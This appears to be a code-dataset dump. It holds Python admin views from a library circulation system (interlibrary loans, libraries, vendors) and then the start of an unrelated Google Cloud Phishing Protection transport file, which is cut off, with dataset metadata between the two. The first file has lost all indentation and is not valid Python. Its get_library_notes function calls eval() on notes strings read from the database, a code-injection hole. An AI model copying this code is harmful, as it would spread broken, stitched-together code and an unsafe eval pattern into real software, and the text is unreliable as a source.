def list_ill_request(req, status, ln=CFG_SITE_LANG):
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
ill_req = db.get_ill_requests(status)
body = bc_templates.tmpl_list_ill(ill_req=ill_req, ln=ln)
return page(title=_("List of ILL requests"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def list_purchase(req, status, recid=None, ln=CFG_SITE_LANG):
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if recid:
# Purchases of a particular item to be displayed in the item info page.
purchase_reqs = db.get_item_purchases(status, recid)
else:
purchase_reqs = db.get_purchases(status)
body = bc_templates.tmpl_list_purchase(purchase_reqs, ln=ln)
return page(title=_("List of purchase requests"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def list_proposal(req, status, ln=CFG_SITE_LANG):
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if status == "requests-putaside":
requests = db.get_requests_on_put_aside_proposals()
body = bc_templates.tmpl_list_requests_on_put_aside_proposals(requests, ln=ln)
title=_("List of requests on put aside proposals")
else:
proposals = db.get_proposals(status)
body = bc_templates.tmpl_list_proposal(proposals, ln=ln)
title=_("List of proposals")
return page(title=title,
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def ill_search(req, ln=CFG_SITE_LANG):
infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_ill_search(infos=infos, ln=ln)
return page(title=_("ILL search"),
uid=id_user,
req=req,
body=body,
language=ln,
metaheaderadd='<link rel="stylesheet" href="%s/vendors/jquery-ui/themes/redmond/jquery-ui.min.css" '\
'type="text/css" />' % CFG_SITE_SECURE_URL,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def ill_search_result(req, p, f, date_from, date_to, ln):
"""
Search an item and return a list with all the possible results. To retrieve
the information desired, we use the method 'perform_request_search' (from
search_engine.py). In the case of BibCirculation, we are just looking for
books (items) inside the collection 'Books'.
@type p: string
@param p: search pattern
@type f: string
@param f: search field
@return: list of recids
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
#id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if not has_date_format(date_from):
date_from = '0000-00-00'
if not has_date_format(date_to):
date_to = '9999-12-31'
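    # Malformed dates are replaced by sentinel bounds, which makes the date
    # filter effectively open-ended on that side: '0000-00-00' sorts before
    # any real date and '9999-12-31' after all of them.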
if f == 'title':
ill_req = db.search_ill_requests_title(p, date_from, date_to)
body = bc_templates.tmpl_list_ill(ill_req=ill_req, ln=ln)
elif f == 'ILL_request_ID':
ill_req = db.search_ill_requests_id(p, date_from, date_to)
body = bc_templates.tmpl_list_ill(ill_req=ill_req, ln=ln)
elif f == 'cost':
purchase_reqs = db.search_requests_cost(p, date_from, date_to)
body = bc_templates.tmpl_list_purchase(purchase_reqs=purchase_reqs, ln=ln)
elif f == 'notes':
purchase_reqs = db.search_requests_notes(p, date_from, date_to)
body = bc_templates.tmpl_list_purchase(purchase_reqs=purchase_reqs, ln=ln)
return page(title=_("List of ILL requests"),
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
###
### "Library" related templates ###
###
def get_library_details(req, library_id, ln=CFG_SITE_LANG):
"""
Display the details of a library.
@type library_id: integer.
@param library_id: identify the library. It is also the primary key of
the table crcLIBRARY.
@return: library details.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
navtrail_previous_links = '<a class="navtrail" ' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
library_details = db.get_library_details(library_id)
if library_details is None:
_ = gettext_set_language(ln)
infos = []
infos.append(_('Library ID not found.'))
return search_library_step1(req, infos, ln)
library_items = db.get_library_items(library_id)
body = bc_templates.tmpl_library_details(library_details=library_details,
library_items=library_items,
ln=ln)
return page(title=_("Library details"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def merge_libraries_step1(req, library_id, f=None, p=None, ln=CFG_SITE_LANG):
"""
Step 1/3 of library merging procedure
@param library_id: ID of the library to be deleted
@param p: search pattern.
@param f: field
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
navtrail_previous_links = '<a class="navtrail" ' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
library_details = db.get_library_details(library_id)
library_items = db.get_library_items(library_id)
result = None
if f is not None:
if p in (None, '', '*'):
result = db.get_all_libraries() #list of (id, name)
elif f == 'name':
result = db.search_library_by_name(p)
elif f == 'email':
result = db.search_library_by_email(p)
body = bc_templates.tmpl_merge_libraries_step1(
library_details=library_details,
library_items=library_items,
result=result,
p=p,
ln=ln)
return page(title=_("Merge libraries"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def merge_libraries_step2(req, library_from, library_to, ln=CFG_SITE_LANG):
"""
Step 2/3 of library merging procedure
Confirm the libraries selected
@param library_from: ID of the library to be deleted
@param library_to: ID of the resulting library
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
navtrail_previous_links = '<a class="navtrail" ' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
library_from_details = db.get_library_details(library_from)
library_from_items = db.get_library_items(library_from)
library_to_details = db.get_library_details(library_to)
library_to_items = db.get_library_items(library_to)
body = bc_templates.tmpl_merge_libraries_step2(
library_from_details=library_from_details,
library_from_items=library_from_items,
library_to_details=library_to_details,
library_to_items=library_to_items,
ln=ln)
return page(title=_("Merge libraries"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def merge_libraries_step3(req, library_from, library_to, ln=CFG_SITE_LANG):
"""
Step 3/3 of library merging procedure
Perform the merge and display the details of the resulting library
@param library_from: ID of the library to be deleted
@param library_to: ID of the resulting library
"""
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
db.merge_libraries(library_from, library_to)
return get_library_details(req, library_to, ln)
def add_new_library_step1(req, ln=CFG_SITE_LANG):
"""
Add a new Library.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_add_new_library_step1(ln=ln)
return page(title=_("Add new library"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_library_step2(req, name, email, phone, address,
lib_type, notes, ln=CFG_SITE_LANG):
"""
Add a new Library.
"""
tup_infos = (name, email, phone, address, lib_type, notes)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
_ = gettext_set_language(ln)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
body = bc_templates.tmpl_add_new_library_step2(tup_infos=tup_infos, ln=ln)
return page(title=_("Add new library"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_library_step3(req, name, email, phone, address,
lib_type, notes, ln=CFG_SITE_LANG):
"""
Add a new Library.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
db.add_new_library(name, email, phone, address, lib_type, notes)
body = bc_templates.tmpl_add_new_library_step3(ln=ln)
return page(title=_("Add new library"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_library_info_step1(req, ln=CFG_SITE_LANG):
"""
Update the library's information.
"""
infos = []
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_update_library_info_step1(infos=infos, ln=ln)
return page(title=_("Update library information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_library_info_step2(req, column, string, ln=CFG_SITE_LANG):
"""
Update the library's information.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if not string:
infos = []
infos.append(_("Empty string.") + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_update_library_info_step1(infos=infos, ln=ln)
elif string == '*':
result = db.get_all_libraries()
body = bc_templates.tmpl_update_library_info_step2(result=result, ln=ln)
else:
if column == 'name':
result = db.search_library_by_name(string)
else:
result = db.search_library_by_email(string)
body = bc_templates.tmpl_update_library_info_step2(result=result, ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("Update library information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_library_info_step3(req, library_id, ln=CFG_SITE_LANG):
"""
Update the library's information.
library_id - identify the library. It is also the primary key of
the table crcLIBRARY.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
library_info = db.get_library_details(library_id)
body = bc_templates.tmpl_update_library_info_step3(
library_info=library_info,
ln=ln)
return page(title=_("Update library information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_library_info_step4(req, name, email, phone, address, lib_type,
library_id, ln=CFG_SITE_LANG):
"""
Update the library's information.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
tup_infos = (library_id, name, email, phone, address, lib_type)
body = bc_templates.tmpl_update_library_info_step4(tup_infos=tup_infos,
ln=ln)
return page(title=_("Update library information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_library_info_step5(req, name, email, phone, address, lib_type,
library_id, ln=CFG_SITE_LANG):
"""
Update the library's information.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
#(library_id, name, email, phone, address) = tup_infos
db.update_library_info(library_id, name, email, phone, address, lib_type)
body = bc_templates.tmpl_update_library_info_step5(ln=ln)
return page(title=_("Update library information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_library_notes(req, library_id, delete_key,
library_notes, ln=CFG_SITE_LANG):
"""
Retrieve notes related with a library.
library_id - identify the library. It is also the primary key of
the table crcLIBRARY.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if delete_key and library_id:
if looks_like_dictionary(db.get_library_notes(library_id)):
lib_notes = eval(db.get_library_notes(library_id))
if delete_key in lib_notes.keys():
del lib_notes[delete_key]
db.update_library_notes(library_id, lib_notes)
elif library_notes:
if db.get_library_notes(library_id):
if looks_like_dictionary(db.get_library_notes(library_id)):
lib_notes = eval(db.get_library_notes(library_id))
else:
lib_notes = {}
else:
lib_notes = {}
lib_notes[time.strftime("%Y-%m-%d %H:%M:%S")] = str(library_notes)
db.update_library_notes(library_id, lib_notes)
lib_notes = db.get_library_notes(library_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
body = bc_templates.tmpl_library_notes(library_notes=lib_notes,
library_id=library_id,
ln=ln)
return page(title=_("Library notes"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def search_library_step1(req, infos=[], ln=CFG_SITE_LANG):
"""
Display the form where we can search a library (by name or email).
"""
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_search_library_step1(infos=infos,
ln=ln)
return page(title=_("Search library"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def search_library_step2(req, column, string, ln=CFG_SITE_LANG):
"""
Search a library and return a list with all the possible results, using the
parameters received from the previous step.
column - identify the column, of the table crcLIBRARY, that will be
considered during the search. Can be 'name' or 'email'.
    string - string used for the search process.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if not string:
infos = []
infos.append(_("Emptry string.") + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_search_library_step1(infos=infos, ln=ln)
elif string == '*':
result = db.get_all_libraries()
body = bc_templates.tmpl_search_library_step2(result=result, ln=ln)
else:
if column == 'name':
result = db.search_library_by_name(string)
else:
result = db.search_library_by_email(string)
body = bc_templates.tmpl_search_library_step2(result=result, ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
return page(title=_("Search library"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
###
### "Vendor" related templates ###
###
def get_vendor_details(req, vendor_id, ln=CFG_SITE_LANG):
"""
Display the details of a vendor.
@type vendor_id: integer.
@param vendor_id: identify the vendor. It is also the primary key of
the table crcVENDOR.
@return: vendor details.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
vendor_details = db.get_vendor_details(vendor_id)
navtrail_previous_links = '<a class="navtrail" ' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_vendor_details(vendor_details=vendor_details,
ln=ln)
return page(title=_("Vendor details"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_vendor_step1(req, ln=CFG_SITE_LANG):
"""
Add a new Vendor.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_add_new_vendor_step1(ln=ln)
return page(title=_("Add new vendor"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_vendor_step2(req, name, email, phone, address,
notes, ln=CFG_SITE_LANG):
"""
Add a new Vendor.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
tup_infos = (name, email, phone, address, notes)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_add_new_vendor_step2(tup_infos=tup_infos, ln=ln)
return page(title=_("Add new vendor"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_vendor_step3(req, name, email, phone, address,
notes, ln=CFG_SITE_LANG):
"""
Add a new Vendor.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
db.add_new_vendor(name, email, phone, address, notes)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_add_new_vendor_step3(ln=ln)
return page(title=_("Add new vendor"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_vendor_info_step1(req, ln=CFG_SITE_LANG):
"""
Update the vendor's information.
"""
infos = []
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
_ = gettext_set_language(ln)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
body = bc_templates.tmpl_update_vendor_info_step1(infos=infos, ln=ln)
return page(title=_("Update vendor information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_vendor_info_step2(req, column, string, ln=CFG_SITE_LANG):
"""
Update the vendor's information.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if not string:
infos = []
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_update_vendor_info_step1(infos=infos, ln=ln)
elif string == '*':
result = db.get_all_vendors()
body = bc_templates.tmpl_update_vendor_info_step2(result=result, ln=ln)
else:
if column == 'name':
result = db.search_vendor_by_name(string)
else:
result = db.search_vendor_by_email(string)
body = bc_templates.tmpl_update_vendor_info_step2(result=result, ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("Update vendor information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_vendor_info_step3(req, vendor_id, ln=CFG_SITE_LANG):
"""
    Update the vendor's information.
vendor_id - identify the vendor. It is also the primary key of
the table crcVENDOR.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
vendor_info = db.get_vendor_details(vendor_id)
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_update_vendor_info_step3(vendor_info=vendor_info,
ln=ln)
return page(title=_("Update vendor information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_vendor_info_step4(req, name, email, phone, address,
vendor_id, ln=CFG_SITE_LANG):
"""
Update the vendor's information.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
tup_infos = (vendor_id, name, email, phone, address)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_update_vendor_info_step4(tup_infos=tup_infos,
ln=ln)
return page(title=_("Update vendor information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_vendor_info_step5(req, name, email, phone, address,
vendor_id, ln=CFG_SITE_LANG):
"""
    Update the vendor's information.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
db.update_vendor_info(vendor_id, name, email, phone, address)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_update_vendor_info_step5(ln=ln)
return page(title=_("Update vendor information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_vendor_notes(req, vendor_id, add_notes, new_note, ln=CFG_SITE_LANG):
"""
Retrieve notes related with a vendor.
vendor_id - identify the vendor. It is also the primary key of
the table crcVENDOR.
    @param add_notes: whether to display the textarea where a new note will
                      be written.
    @param new_note: note that will be appended to the vendor's existing notes.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if new_note:
date = '[' + time.ctime() + '] '
new_line = '\n'
new_note = date + new_note + new_line
db.add_new_vendor_note(new_note, vendor_id)
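    # Unlike library and ILL notes (stringified dicts keyed by timestamp),
    # vendor notes are appended as plain text, one "[<ctime>] <note>\n" entry
    # at a time, so individual entries cannot be deleted via a delete_key.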
vendor_notes = db.get_vendor_notes(vendor_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_vendor_notes(vendor_notes=vendor_notes,
vendor_id=vendor_id,
add_notes=add_notes,
ln=ln)
return page(title=_("Vendor notes"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def search_vendor_step1(req, ln=CFG_SITE_LANG):
"""
Display the form where we can search a vendor (by name or email).
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_search_vendor_step1(infos=infos,
ln=ln)
return page(title=_("Search vendor"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def search_vendor_step2(req, column, string, ln=CFG_SITE_LANG):
"""
Search a vendor and return a list with all the possible results, using the
parameters received from the previous step.
column - identify the column, of the table crcVENDOR, that will be
considered during the search. Can be 'name' or 'email'.
    string - string used for the search process.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if not string:
infos = []
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_search_vendor_step1(infos=infos,
ln=ln)
elif string == '*':
result = db.get_all_vendors()
body = bc_templates.tmpl_search_vendor_step2(result=result, ln=ln)
else:
if column == 'name':
result = db.search_vendor_by_name(string)
else:
result = db.search_vendor_by_email(string)
body = bc_templates.tmpl_search_vendor_step2(result=result, ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("Search vendor"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
|
gpl-2.0
| 8,329,778,068,518,806,000
| 37.514354
| 347
| 0.521028
| false
| 3.899847
| false
| false
| false
|
googleapis/python-phishingprotection
|
google/cloud/phishingprotection_v1beta1/services/phishing_protection_service_v1_beta1/transports/base.py
|
1
|
6953
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import packaging.version
import pkg_resources
import google.auth # type: ignore
import google.api_core # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.phishingprotection_v1beta1.types import phishingprotection
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-phishingprotection",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
try:
# google.auth.__version__ was added in 1.26.0
_GOOGLE_AUTH_VERSION = google.auth.__version__
except AttributeError:
try: # try pkg_resources if it is available
_GOOGLE_AUTH_VERSION = pkg_resources.get_distribution("google-auth").version
except pkg_resources.DistributionNotFound: # pragma: NO COVER
_GOOGLE_AUTH_VERSION = None
class PhishingProtectionServiceV1Beta1Transport(abc.ABC):
"""Abstract transport class for PhishingProtectionServiceV1Beta1."""
AUTH_SCOPES = ("https://www.googleapis.com/auth/cloud-platform",)
DEFAULT_HOST: str = "phishingprotection.googleapis.com"
def __init__(
self,
*,
host: str = DEFAULT_HOST,
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
scopes_kwargs = self._get_scopes_kwargs(self._host, scopes)
# Save the scopes.
self._scopes = scopes
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise core_exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = google.auth.load_credentials_from_file(
credentials_file, **scopes_kwargs, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = google.auth.default(
**scopes_kwargs, quota_project_id=quota_project_id
)
# If the credentials is service account credentials, then always try to use self signed JWT.
if (
always_use_jwt_access
and isinstance(credentials, service_account.Credentials)
and hasattr(service_account.Credentials, "with_always_use_jwt_access")
):
credentials = credentials.with_always_use_jwt_access(True)
# Save the credentials.
self._credentials = credentials
# TODO(busunkim): This method is in the base transport
# to avoid duplicating code across the transport classes. These functions
# should be deleted once the minimum required versions of google-auth is increased.
# TODO: Remove this function once google-auth >= 1.25.0 is required
@classmethod
def _get_scopes_kwargs(
